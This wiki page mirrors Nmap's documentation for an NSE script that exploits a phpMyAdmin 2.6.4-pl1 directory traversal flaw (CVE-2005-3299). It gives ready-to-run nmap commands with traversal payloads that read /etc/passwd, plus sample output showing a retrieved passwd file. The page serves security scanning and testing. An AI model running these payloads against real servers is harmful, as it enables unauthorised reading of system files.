Onnowpurbo: New page: Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html ==File http-phpmyadmin-dir-traversal== Script types: portrule Categories: vuln, exploit Download: http://n...

2016-02-14T13:36:31Z

New page: Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html ==File http-phpmyadmin-dir-traversal== Script types: portrule Categories: vuln, exploit Download: http://n...

New page

Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html

==File http-phpmyadmin-dir-traversal==

Script types: portrule
Categories: vuln, exploit
Download: http://nmap.org/svn/scripts/http-phpmyadmin-dir-traversal.nse

==User Summary==

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.

==Reference:==

http://www.exploit-db.com/exploits/1244/

Script Arguments

http-phpmyadmin-dir-traversal.dir

Basepath to the services page. Default: /phpMyAdmin-2.6.4-pl1/
http-phpmyadmin-dir-traversal.file

Remote file to retrieve. Default: ../../../../../etc/passwd
http-phpmyadmin-dir-traversal.outfile

Output file
slaxml.debug
See the documentation for the slaxml library.
http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent
See the documentation for the http library.
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
vulns.showall
See the documentation for the vulns library.

==Example Usage==

nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>

==Script Output==

PORT STATE SERVICE
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2005-3299
| Description:
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../../../../etc/passwd :
| root:x:0:0:root:/root:/bin/bash
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh
| bin:x:2:2:bin:/bin:/bin/sh
| sys:x:3:3:sys:/dev:/bin/sh
| sync:x:4:65534:sync:/bin:/bin/sync
| games:x:5:60:games:/usr/games:/bin/sh
| man:x:6:12:man:/var/cache/man:/bin/sh
| lp:x:7:7:lp:/var/spool/lpd:/bin/sh
| mail:x:8:8:mail:/var/mail:/bin/sh
| news:x:9:9:news:/var/spool/news:/bin/sh
| uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
| proxy:x:13:13:proxy:/bin:/bin/sh
| www-data:x:33:33:www-data:/var/www:/bin/sh
| backup:x:34:34:backup:/var/backups:/bin/sh
| list:x:38:38:Mailing List Manager:/var/list:/bin/sh
| irc:x:39:39:ircd:/var/run/ircd:/bin/sh
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
| nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
| libuuid:x:100:101::/var/lib/libuuid:/bin/sh
| syslog:x:101:103::/home/syslog:/bin/false
| sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
| dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
| vboxadd:x:999:1::/var/run/vboxadd:/bin/false
| mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
| memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
| ../../../../../../../../etc/passwd saved to passwd.txt
|
| References:
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/

==Referensi==

* https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html

Nmap: phpmyadmin dir travesal - Revision history

Onnowpurbo: New page: Sumber: https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html ==File http-phpmyadmin-dir-traversal== Script types: portrule Categories: vuln, exploit Download: http://n...